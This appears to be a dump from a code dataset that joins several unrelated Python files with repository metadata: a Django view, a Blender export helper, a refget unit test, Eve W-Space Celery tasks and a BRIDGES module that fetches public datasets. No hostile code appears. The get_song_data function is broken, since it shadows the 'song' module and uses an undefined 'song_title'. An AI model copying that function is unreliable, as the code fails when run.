return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
elif req.method == 'POST':
p = _createParams(req)
deployment = get_object_or_404(Deployment, slug=slug)
# check user permissions
if deployment.owner == req.user:
form = AssociateDeploymentForm(req.POST)
if form.is_valid():
_save_associate_deployment(form, deployment)
messages.add_message(req, messages.INFO,
'Deployment "%s" successfully updated.' % deployment.name)
return HttpResponseRedirect(reverse('deployments'))
else:
p['form'] = form
return render_to_response(TEMPLATE_PATH + 'associate.html',
p, context_instance=RequestContext(req))
else:
messages.add_message(req, messages.INFO,
'You must be the owner of a deployment to edit it.')
return HttpResponseRedirect(reverse('deployments'))
@login_required
def associate_deployment(req):
p = _createParams(req)
if req.method == 'GET':
p['form'] = AssociateDeploymentForm()
return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
elif req.method == 'POST':
form = AssociateDeploymentForm(req.POST)
if form.is_valid():
d = Deployment()
d.owner = req.user
_save_associate_deployment(form, d)
messages.add_message(req, messages.INFO,
'%s successfully associated with %s.' % (d.project,
d.provider))
return HttpResponseRedirect(reverse('deployments'))
else:
p['form'] = form
return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
def _save_associate_deployment(form, d):
d.name = form.cleaned_data['name']
d.slug = _slugit(Deployment, d.name)
d.provider = form.cleaned_data['provider']
d.project = form.cleaned_data['project']
d.username = form.cleaned_data['username']
d.ip_address = form.cleaned_data['ip_address']
d.ssh_port = form.cleaned_data['ssh_port']
d.save()
| 37.5 | 78 | 0.668027 | 411 | 3,675 | 5.793187 | 0.245742 | 0.037799 | 0.040319 | 0.046199 | 0.392272 | 0.294834 | 0.223436 | 0.223436 | 0.148677 | 0.148677 | 0 | 0.003185 | 0.23102 | 3,675 | 97 | 79 | 37.886598 | 0.839349 | 0.005986 | 0 | 0.395062 | 0 | 0 | 0.103014 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061728 | false | 0 | 0.160494 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1406030bc96045cc5ac86ac183e1b7807a173011 | 1,802 | py | Python | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 41 | 2019-11-14T07:42:37.000Z | 2022-02-21T13:22:02.000Z | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 58 | 2019-04-22T14:53:04.000Z | 2022-03-15T10:04:36.000Z | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 17 | 2019-08-24T13:59:01.000Z | 2022-02-16T15:47:18.000Z | import json
import os
import sys
import bpy #pylint: disable=import-error
def convert_files(convertfn, outputext):
args = sys.argv[sys.argv.index('--')+1:]
#print(args)
settings_fname, srcroot, dstdir, blendfiles = args[0], args[1], args[2], args[3:]
if not srcroot.endswith(os.sep):
srcroot += os.sep
if not dstdir.endswith(os.sep):
dstdir += os.sep
print('srcroot:', srcroot)
print('Exporting:', blendfiles)
print('Export to:', dstdir)
with open(settings_fname) as settings_file:
settings = json.load(settings_file)
try:
for blendfile in blendfiles:
src = blendfile
dst = src.replace(srcroot, dstdir).replace('.blend', '.'+outputext)
bpy.ops.wm.open_mainfile(filepath=src)
convertfn(settings, src, dst)
except: #pylint: disable=bare-except
import traceback
traceback.print_exc(file=sys.stderr)
print('Failed to convert {} to {}'.format(src, outputext), file=sys.stderr)
sys.exit(1)
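# Typical invocation (assumed): Blender forwards everything after '--' to sys.argv, e.g.
# blender --background --python convert_script.py -- settings.json /src/root /dst/dir a.blend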
def in_blender_28():
version = bpy.app.version
return version[0] >= 2 and version[1] >= 80
def make_particles_real():
try:
bpy.ops.object.mode_set(mode='OBJECT')
except RuntimeError:
pass
for obj in bpy.data.objects[:]:
if hasattr(obj, 'particle_systems') and obj.particle_systems:
print('Making particles on {} real'.format(obj.name))
try:
if in_blender_28():
obj.select_set(True)
else:
obj.select = True
bpy.ops.object.duplicates_make_real()
except RuntimeError as error:
print('Failed to make particles real on {}: {}'.format(obj.name, error), file=sys.stderr)
| 29.064516 | 105 | 0.602109 | 223 | 1,802 | 4.780269 | 0.38565 | 0.018762 | 0.036585 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011477 | 0.274695 | 1,802 | 61 | 106 | 29.540984 | 0.804132 | 0.036626 | 0 | 0.065217 | 0 | 0 | 0.087132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.021739 | 0.108696 | 0 | 0.195652 | 0.152174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1407baf11e4f8bf8634e13cfdd86fac65a4deec4 | 989 | py | Python | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | 3 | 2021-04-30T21:12:42.000Z | 2021-06-02T02:11:45.000Z | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit tests for get_service_info method"""
import json
import pytest
from ga4gh.refget.config.service_info import SERVICE_INFO
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.routes.sequence.get_service_info import get_service_info
from test.common.methods import setup_properties_request_response
props_dict = {}
testdata = [
({}, SC.OK, json.dumps({"service": SERVICE_INFO})),
(
{"header": {"Accept": "text/strange-encoding"}},
SC.NOT_ACCEPTABLE,
json.dumps({"message": "requested media type(s) not supported"})
)
]
@pytest.mark.parametrize("request_dict,exp_sc,exp_body", testdata)
def test_get_service_info(request_dict, exp_sc, exp_body):
properties, request, response = setup_properties_request_response(
props_dict, request_dict)
get_service_info(properties, request, response)
assert response.get_status_code() == exp_sc
assert response.get_body() == exp_body
| 34.103448 | 74 | 0.73913 | 132 | 989 | 5.265152 | 0.431818 | 0.126619 | 0.100719 | 0.086331 | 0.178417 | 0.178417 | 0 | 0 | 0 | 0 | 0 | 0.004728 | 0.144591 | 989 | 28 | 75 | 35.321429 | 0.816785 | 0.061678 | 0 | 0 | 0 | 0 | 0.121475 | 0.053145 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.045455 | false | 0 | 0.272727 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140a827ee20450927c1a2ee95317625a892e4780 | 4,215 | py | Python | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timedelta
from celery import task
from Map.models import System, KSystem, Signature
from core.models import Faction
import eveapi
from API import cache_handler as handler
from django.core.cache import cache
import pytz
@task()
def update_system_stats():
"""
Updates the System Statistics (jumps, kills) from the API.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
jumpapi = api.map.Jumps()
killapi = api.map.Kills()
System.objects.all().update(shipkills=0, podkills=0, npckills=0)
KSystem.objects.all().update(jumps=0)
# Update jumps from Jumps API for K-space systems
for entry in jumpapi.solarSystems:
try:
KSystem.objects.filter(pk=entry.solarSystemID).update(
jumps=entry.shipJumps)
except Exception:
pass
# Update kills from Kills API
for entry in killapi.solarSystems:
try:
System.objects.filter(pk=entry.solarSystemID).update(
shipkills=entry.shipKills,
podkills=entry.podKills,
npckills=entry.factionKills
)
except Exception:
pass
@task()
def update_system_sov():
"""
Updates the Sov for K-Space systems. If any exceptions are raised
(e.g. Alliance record doesn't exist), sov is just marked "None."
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
sovapi = api.map.Sovereignty()
alliance_list = api.eve.AllianceList().alliances
lookup_table = {}
for alliance in alliance_list:
lookup_table[alliance.allianceID] = alliance.name
KSystem.objects.all().update(sov="None")
for sys in sovapi.solarSystems:
try:
if sys.factionID:
KSystem.objects.filter(pk=sys.solarSystemID).update(
sov=Faction.objects.get(pk=sys.factionID).name)
elif sys.allianceID:
if sys.allianceID in lookup_table:
KSystem.objects.filter(pk=sys.solarSystemID).update(
sov=lookup_table[sys.allianceID])
except Exception:
pass
@task()
def fill_jumps_cache():
"""
Ensures that the jumps cache is filled.
"""
if not cache.get('route_graph'):
from Map.utils import RouteFinder
rf = RouteFinder()
# Initializing RouteFinder should be sufficient to cache the graph
# If it doesn't for some reason, we explicitly cache it
if not cache.get('route_graph'):
rf._cache_graph()
@task()
def check_server_status():
"""
Checks the server status, if it detects the server is down,
set updated=False on all signatures. This is deprecated as of Hyperion and
is maintained to prevent older configuration files from breaking on upgrade.
"""
return None
@task()
def downtime_site_update():
"""
This task should be run during the scheduled EVE downtime.
It triggers the increment_downtime function on all signatures
that have been activated.
"""
for sig in Signature.objects.all():
if sig.downtimes or sig.downtimes == 0:
sig.increment_downtime()
@task()
def clear_stale_records():
"""
This task will clear any user location records older than 15 minutes.
"""
limit = datetime.now(pytz.utc) - timedelta(minutes=15)
Signature.objects.filter(owned_time__isnull=False,
owned_time__lt=limit).update(owned_time=None,
owned_by=None)
| 33.188976 | 80 | 0.655753 | 528 | 4,215 | 5.172348 | 0.397727 | 0.02197 | 0.02197 | 0.024167 | 0.131088 | 0.079824 | 0.03442 | 0.03442 | 0 | 0 | 0 | 0.005461 | 0.261447 | 4,215 | 126 | 81 | 33.452381 | 0.871828 | 0.345433 | 0 | 0.295775 | 0 | 0 | 0.009882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084507 | false | 0.042254 | 0.126761 | 0 | 0.225352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140b00a4e0df52e767311698ec7c06d3fcf99b25 | 23,000 | py | Python | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | import json
import requests
import pickle
import sys
from bridges.data_src_dependent import earthquake_usgs
from bridges.data_src_dependent import actor_movie_imdb
from bridges.data_src_dependent import game
from bridges.data_src_dependent import shakespeare
from bridges.data_src_dependent import gutenberg_book
from bridges.data_src_dependent import cancer_incidence
from bridges.data_src_dependent import song
from bridges.data_src_dependent import lru_cache
from bridges.data_src_dependent import movie_actor_wiki_data
from bridges.data_src_dependent.osm import *
from bridges.data_src_dependent.elevation import *
from bridges.data_src_dependent.actor_movie_imdb import *
from bridges.color_grid import ColorGrid
from bridges.color import Color
from SPARQLWrapper import SPARQLWrapper, JSON
##
#
# Get meta data of the IGN games collection.
#
# This function retrieves and formats the data into a list of
# Game objects
#
# @throws Exception if the request fails
#
# @return a list of Game objects,
#
#
def get_game_data():
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/games"
PARAMS = {"Accept: application/json"}
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
D = r["data"]
# print(D)
for i in range(len(D)):
V = D[i]
G = V["genre"]
genre = []
for j in range(len(G)):
genre.append(str(G[j]))
wrapper.append(game.Game(V["game"], V["platform"], V["rating"], str(genre)))
return wrapper
def parse_actor_movie_imdb(item):
am_pair = ActorMovieIMDB()
am_pair.actor = item["actor"]
am_pair.movie = item["movie"]
return am_pair
##
# Get ActorMovie IMDB Data
# retrieved, formatted into a list of ActorMovieIMDB objects
#
# @param number the number of actor/movie pairs, but currently unused,
# returns all records.
# @throws Exception if the request fails
#
# @return a list of ActorMovieIMDB objects, but only actor and
# movie fields in this version
#
def get_actor_movie_imdb_data(number = 0):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/imdb?limit=" + str(number)
PARAMS = {"Accept: application/json"}
r = requests.get(url=url, params=str(PARAMS))
# print(r.status_code, r.reason)
data = r.json()
D = data["data"]
for i in range(len(D)):
V = D[i]
wrapper.append(actor_movie_imdb.ActorMovieIMDB(V["actor"], V["movie"]))
return wrapper
def get_actor_movie_imdb_data2():
url = "https://bridgesdata.herokuapp.com/api/imdb2"
r = requests.get(url = url)
status = r.status_code
data = r.json()
D = data["data"]
am_list = []
if status == 200:
for i in range(len(D)):
V = D[i]
am_pair = parse_actor_movie_imdb(V)
am_pair.rating = int(V['rating'])
genre = V['genres']
v = []
for k in range(len(genre)):
v.append(genre[k])
am_pair._genres = v
am_list.append(am_pair)
return am_list
else:
r.raise_for_status()
##
# Get USGS earthquake data
# USGS Tweet data (https://earthquake.usgs.gov/earthquakes/map/)
# retrieved, formatted into a list of EarthquakeUSGS objects
#
# @param number the number of earthquake records retrieved,
# limited to 5000
# @throws Exception if the request fails
#
# @return a list of earthquake records
#
def get_earthquake_usgs_data(number = 0):
wrapper = []
url = "http://earthquakes-uncc.herokuapp.com/eq"
latest_url = "http://earthquakes-uncc.herokuapp.com/eq/latest/" + str(number)
PARAMS = {"Accept: application/json"}
if number <= 0:
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
for i in range(len(r)):
V = r[i]["properties"]
G = r[i]["geometry"]["coordinates"]
wrapper.append(earthquake_usgs.EarthquakeUSGS(V["mag"], G[0], G[1], V["place"], V["title"], V["url"], V["time"]))
else:
r = requests.get(url=latest_url, params=str(PARAMS))
data = r.json()
D = data["Earthquakes"]
for i in range(len(D)):
V = D[i]["properties"]
G = D[i]["geometry"]["coordinates"]
wrapper.append(earthquake_usgs.EarthquakeUSGS(V["mag"], G[0], G[1], V["place"], V["title"], V["url"], V["time"]))
return wrapper
##
#
# Get data of Shakespeare works (plays, poems)
#
# This function retrieves and formats the data into a
# a list of Shakespeare objects.
#
# Valid endpoints: 'poems','plays', <title>
# Valid queryParams: format{simple}
#
# @throws Exception if the request fails
#
# @param endpoint can be either "plays" or "poems". If this is
# specified, then only these types of works are retrieved.
# @param textOnly if this is set, then only the text is retrieved.
#
# @return an array of Shakespeare objects
#
#
def get_shakespeare_data(endpoint = "", textonly = False):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/shakespeare/"
PARAMS = {"Accept: application/json"}
if endpoint == "plays" or endpoint == "poems":
url += "/" + endpoint
if textonly:
url += "?format=simple"
r = requests.get(url = url, params = str(PARAMS))
r = r.json()
D = r["data"]
for i in range(len(D)):
V = D[i]
wrapper.append(shakespeare.Shakespeare(V["title"], V["type"], V["text"]))
return wrapper
##
#
# Get meta data of the Gutenberg book collection (1000 books)
# This function retrieves, and formats the data into a list of
# GutenbergBook objects
#
# @throws Exception if the request fails
#
# @return a list of GutenbergBook objects,
#
#
def get_gutenberg_book_data(num = 0):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/books"
PARAMS = {"Accept: application/json"}
if num > 0:
url += "?limit=" + str(num)
r = requests.get(url=url, params = str(PARAMS))
r = r.json()
D = r["data"]
for i in range(len(D)):
V = D[i]
A = V["author"]
L = V["languages"]
lang = []
for j in range(len(L)):
lang.append(str(L[j]))
G = V["genres"]
genre = []
for j in range(len(G)):
genre.append(str(G[j]))
S = V["subjects"]
subject = []
for j in range(len(S)):
subject.append(str(S[j]))
M = V["metrics"]
wrapper.append(gutenberg_book.GutenbergBook(A["name"], A["birth"], A["death"], V["title"],
str(lang), str(genre), str(subject), M["characters"], M["words"],
M["sentences"], M["difficultWords"], V["url"], V["downloads"]))
return wrapper
##
# Retrieves the CDC dataset into a list of records
# See CancerIncidence class for more information
#
#
def get_cancer_incident_data(num = 0):
wrapper = []
url = "https://bridgesdata.herokuapp.com/api/cancer/withlocations"
PARAMS = {"Accept: application/json"}
if num > 0:
url += "?limit="+str(num)
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
D = r["data"]
# c = CancerIncidence.CancerIncidence()
for i in range(len(D)):
c = cancer_incidence.CancerIncidence()
v = D[i]
age = v["Age"]
c.set_age_adjusted_rate(age["Age Adjusted Rate"])
c.set_age_adjusted_ci_lower(age["Age Adjusted CI Lower"])
c.set_age_adjusted_ci_upper(age["Age Adjusted CI Upper"])
c.set_year(v["Year"])
data = v["Data"]
c.set_crude_rate(data["Crude Rate"])
c.set_crude_rate_ci_lower(data["Crude CI Lower"])
c.set_crude_rate_ci_upper(data["Crude CI Upper"])
c.set_race(data["Race"])
c.set_population(data["Population"])
c.set_event_type(data["Event Type"])
c.set_affected_area(v["Area"])
loc = v["loc"]
c.set_location_x(loc[0])
c.set_location_y(loc[1])
wrapper.append(c)
return wrapper
##
#
# Get data of a particular song (including lyrics) using the Genius API
# (https://docs.genius.com/), given the song title and artist name.
# Valid endpoints: http://bridgesdata.herokuapp.com/api/songs/find/
# Valid queryParams: song title, artist name
#
# This function retrieves and formats the data into a
# Song object. The song if not cached in the local DB is queried
# and added to the DB
#
# @throws Exception if the request fails
#
# @return a Song object,
#
#
def get_song(songTitle, artistName = None):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/songs/find/"
PARAMS = {"Accept: application/json"}
if len(songTitle):
url = url + songTitle
if artistName is not None:
if len(artistName):
url += "?artistName=" + artistName
url = url.replace(" ", "%20")
r = requests.get(url = url, params = str(PARAMS))
if r.status_code != 200:
raise ConnectionError("HTTP Request Failed. Error Code: " + str(r.status_code))
r = r.json()
if "artist" in r:
artist = r["artist"]
else:
artist = ""
if "song" in r:
songs = r["song"]
else:
songs = ""
if "album" in r:
album = r["album"]
else:
album = ""
if "lyrics" in r:
lyrics = r["lyrics"]
else:
lyrics = ""
if "release_date" in r:
release_date = r["release_date"]
else:
release_date = ""
return song.Song(artist, songs, album, lyrics, release_date)
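# Usage sketch (hypothetical title/artist; assumes the Song object exposes a lyrics field):
# s = get_song("Imagine", "John Lennon")
# print(s.lyrics)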
##
#
# Get data of the songs (including lyrics) using the Genius API
# https://docs.genius.com/
# Valid endpoints: https://bridgesdata.herokuapp.com/api/songs/
#
# This function retrieves and formats the data into a list of
# Song objects. This version of the API retrieves all the cached
# songs in the local DB.
#
# @throws Exception if the request fails
#
# @return a list of Song objects,
#
#
def get_song_data():
all_songs = []
url = "http://bridgesdata.herokuapp.com/api/songs/"
params = {"Accept: application/json"}
r = requests.get(url=url, params=str(params))
r = r.json()
D = r["data"]
for i in range(len(D)):
v = D[i]
if "artist" in v:
artist = v["artist"]
else:
artist = ""
if "song" in v:
song = v["song"]
else:
song = ""
if "album" in v:
album = v["album"]
else:
album = ""
if "lyrics" in v:
lyrics = v["lyrics"]
else:
lyrics = ""
if "release_date" in v:
release_date = v["release_date"]
else:
release_date = ""
all_songs.append(song.Song(artist, song_title, album, lyrics, release_date))
return all_songs
def get_color_grid_from_assignment(server: str, user: str, assignment: int, subassignment: int = 0) -> ColorGrid:
"""
Reconstruct a ColorGrid from an existing ColorGrid on the bridges server
:param str server: internal server url of bridges object
:param str user: the name of the user who uploaded the assignment
:param int assignment: the ID of the assignment to get
:param int subassignment: the ID of the subassignment to get (default 0)
:return: ColorGrid: the ColorGrid stored in the bridges server
"""
response = get_assignment(server, user, assignment, subassignment)
try:
from types import SimpleNamespace as Namespace
except ImportError:
# Python 2.x fallback
from argparse import Namespace
assignment_object = json.loads(response, object_hook=lambda d: Namespace(**d))
try:
if assignment_object.assignment_type != "ColorGrid":
raise RuntimeError("Malformed ColorGrid JSON: not a ColorGrid")
data_list = assignment_object.data
if len(data_list) != 1:
raise RuntimeError("Malformed JSON: data is malformed")
data = data_list[0]
try:
encoding = data.encoding
except AttributeError:
# Handle case for ColorGrid generated before encoding field was added
encoding = "RAW"
if encoding != "RLE" and encoding != "RAW":
raise RuntimeError("Malformed ColorGrid JSON: encoding not supported: " + encoding)
if len(data.dimensions) != 2:
raise RuntimeError("Malformed ColorGrid JSON: dimensions are malformed")
dim_x = int(data.dimensions[0])
dim_y = int(data.dimensions[1])
try:
node_string = str(data.nodes)
except (TypeError, ValueError):
raise RuntimeError("Malformed ColorGrid JSON: node is not a String")
import base64
decoded_bytes = bytearray(base64.b64decode(node_string))
decoded = [int(x) for x in decoded_bytes]
except AttributeError:
raise RuntimeError("Malformed JSON: Unable to Parse. Does this assignment exist?")
color_grid = ColorGrid(dim_x, dim_y)
if encoding == "RAW":
if len(decoded) != dim_x * dim_y * 4:
raise RuntimeError("Malformed ColorGrid JSON: nodes is not the size we expect for RAW encoding")
base = 0
for x in range(0, dim_x):
for y in range(0, dim_y):
color = Color(decoded[base],
decoded[base + 1],
decoded[base + 2],
(decoded[base + 3]/255.0)
)
color_grid.set(x, y, color)
base = base + 4
elif encoding == "RLE":
if len(decoded) % 5:
raise RuntimeError("Malformed ColorGrid JSON: RLE nodes are not a multiple of 5")
current_in_decoded = 0
current_in_cg = 0
while current_in_decoded != len(decoded):
repeat = decoded[current_in_decoded]
color = Color(decoded[current_in_decoded + 1],
decoded[current_in_decoded + 2],
decoded[current_in_decoded + 3],
(decoded[current_in_decoded + 4] / 255.0)
)
current_in_decoded = current_in_decoded + 5
while repeat >= 0:
pos_x = int(current_in_cg / dim_y)
pos_y = int(current_in_cg % dim_y)
if pos_x >= dim_x or pos_y >= dim_y:
raise RuntimeError("Malformed ColorGrid JSON: Too much data in nodes")
color_grid.set(pos_x, pos_y, color)
current_in_cg = current_in_cg + 1
repeat = repeat - 1
return color_grid
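# Usage sketch (hypothetical server/user/assignment values):
# cg = get_color_grid_from_assignment("http://bridges-cs.herokuapp.com", "someuser", 1)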
def get_assignment(server: str, user: str, assignment: int, subassignment: int = 0) -> str:
"""
This function obtains the JSON representation of a particular assignment as a string
:param str server: internal server url of bridges object
:param str user: the name of the user who uploaded the assignment
:param int assignment: the ID of the assignment to get
:param int subassignment: the ID of the subassignment to get (default 0)
:return str that is the JSON representation of the subassignment as stored by the bridges server
"""
subassignment_fixed = "0{}".format(subassignment) if subassignment < 10 else subassignment
url = "{}/assignmentJSON/{}.{}/{}".format(server, assignment, subassignment_fixed, user)
params = "Accept: application/json"
request = requests.get(url, params)
if request.ok:
return request.content
else:
raise request.raise_for_status()
def osm_server_request(url):
request = requests.get(url)
if not request.ok and request.status_code == 404:
# retry once; a 404 may mean the requested extract has not been generated yet
request = requests.get(url)
if not request.ok:
request.raise_for_status()
server_data = request.content
return server_data
def get_osm_data(*args) -> OsmData:
"""Takes a location name as a string and returns an OsmData object
:param
:return: OsmData:
"""
if (len(args) == 2):
location = args[0]
level = args[1]
url = "http://cci-bridges-osm.uncc.edu/loc?location=" + location + "&level=" + level
hash_url = "http://cci-bridges-osm.uncc.edu/hash?location=" + location + "&level=" + level
elif (len(args) == 5):
minLat = str(args[0])
minLon = str(args[1])
maxLat = str(args[2])
maxLon = str(args[3])
level = args[4]
url = "http://cci-bridges-osm.uncc.edu/coords?minLon=" + minLon + "&minLat=" + minLat + "&maxLon=" + maxLon + "&maxLat=" + maxLat + "&level=" + level
hash_url = "http://cci-bridges-osm.uncc.edu/hash?minLon=" + minLon + "&minLat=" + minLat + "&maxLon=" + maxLon + "&maxLat=" + maxLat + "&level=" + level
else:
raise RuntimeError("Invalid Map Request Inputs")
lru = lru_cache.lru_cache(30)
try:
from types import SimpleNamespace as Namespace
except ImportError:
from argparse import Namespace
data = None
not_skip = True
hash = osm_server_request(hash_url).decode('utf-8')
if (hash != "false" and lru.inCache(hash)):
not_skip = False
data = lru.get(hash)
if not_skip:
content = osm_server_request(url)
try:
data = json.loads(content.decode('utf-8'), object_hook=lambda d: Namespace(**d))
except:
print("Error: Corrupted JSON download...\nAttempting redownload...")
content = osm_server_request(url)
try:
data = json.loads(content.decode('utf-8'), object_hook=lambda d: Namespace(**d))
except Exception as e:
print(f"Error: Redownload attempt failed\n{e}")
sys.exit(0)
hash = osm_server_request(hash_url).decode('utf-8')
lru.put(hash, data)
try:
if data.nodes is None or data.edges is None or data.meta is None:
raise RuntimeError("Malformed OSM JSON")
vertex_map = {}
vertices = []
for i, node in enumerate(data.nodes):
vertex_map[node[0]] = i
vertices.append(OsmVertex(node[1], node[2]))
edges = []
for edge in data.edges:
id_from = edge[0]
id_to = edge[1]
dist = edge[2]
edges.append(OsmEdge(vertex_map[id_from], vertex_map[id_to], dist))
ret_osm = OsmData()
ret_osm.edges = edges
ret_osm.vertices = vertices
ret_osm.name = data.meta.name
return ret_osm
except AttributeError:
raise RuntimeError("Malformed JSON: Unable to parse")
def elevation_server(url):
request = requests.get(url)
if not request.ok and request.status_code == 404:
# retry once on a 404 before giving up
request = requests.get(url)
if not request.ok:
request.raise_for_status()
server_data = request.content
return server_data
def get_elevation_data(*args):
"""This function returns elevation data for the requested
location and resolution. Note that the data returned may be for a
slightly different location and resolution than requested.
:param args[0]: a bounding box, aka an array [minLat, minLon, maxLat, maxLon]
:param args[1]: spatial resolution, aka the distance between two samples (in degrees)
    :return: EleData for the bounding box and resolution requested (approximately)
"""
base_url = "http://cci-bridges-elevation-t.dyn.uncc.edu/elevation"
hash_url = "http://cci-bridges-elevation-t.dyn.uncc.edu/hash"
coords = args[0]
minLat = coords[0]
minLon = coords[1]
maxLat = coords[2]
maxLon = coords[3]
    res = 0.0166  # default resolution in degrees (roughly one arc-minute)
if len(args) == 2:
res = args[1]
url = base_url + f"?minLat={minLat}&minLon={minLon}&maxLat={maxLat}&maxLon={maxLon}&resX={res}&resY={res}"
hash_url = hash_url + f"?minLat={minLat}&minLon={minLon}&maxLat={maxLat}&maxLon={maxLon}&resX={res}&resY={res}"
#loads cache
lru = lru_cache.lru_cache(30)
data = None
not_skip = True
hash = False
hash = elevation_server(hash_url).decode('utf-8')
if (hash != "false" and lru.inCache(hash)):
not_skip = False
data = lru.get(hash)
if not_skip:
data = elevation_server(url).decode("utf-8")
hash = elevation_server(hash_url).decode('utf-8')
lru.put(hash, data)
#parse and build object
ret_ele = EleData()
file_array = data.splitlines()
ret_ele.cols = int(file_array[0].split(" ")[-1])
ret_ele.rows = int(file_array[1].split(" ")[-1])
ret_ele._xll = float(file_array[2].split(" ")[-1])
ret_ele._yll = float(file_array[3].split(" ")[-1])
ret_ele.cellsize = float(file_array[4].split(" ")[-1])
    # elevation samples start at line 5 of the ASCII grid; split() with no
    # argument tolerates the leading space the old code stripped via pop(0)
    max_val = float("-inf")
    for line in file_array[5:]:
        parsedline = [int(token) for token in line.split()]
        if parsedline:
            max_val = max(max_val, max(parsedline))
        ret_ele.data.append(parsedline)
    ret_ele.maxVal = max_val
return ret_ele
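# Minimal usage sketch (bounding box and resolution are illustrative
# assumptions; the box is [minLat, minLon, maxLat, maxLon]):
#
#   ele = get_elevation_data([35.0, -81.0, 35.5, -80.5], 0.05)
#   print(ele.rows, ele.cols, ele.maxVal)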
def _get_wiki_actor_movie_direct(year_begin, year_end, array_out):
sparql = SPARQLWrapper("https://query.wikidata.org/sparql")
    sparql.setQuery("""
        SELECT ?movie ?movieLabel ?actor ?actorLabel WHERE {{
            ?movie wdt:P31 wd:Q11424.
            ?movie wdt:P161 ?actor.
            ?movie wdt:P364 wd:Q1860.
            ?movie wdt:P577 ?date.
            FILTER(YEAR(?date) >= {year_begin} && YEAR(?date) <= {year_end}).
            SERVICE wikibase:label {{ bd:serviceParam wikibase:language "en". }}
        }}
    """.format(year_begin=year_begin, year_end=year_end))
sparql.addCustomHttpHeader("User-Agent", 'bridges-python')
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
for result in results["results"]["bindings"]:
mak = movie_actor_wiki_data.MovieActorWikiData()
actor_uri = str(result['actor']['value'])
movie_uri = str(result['movie']['value'])
actor_uri = actor_uri.replace("http://www.wikidata.org/entity/","",1)
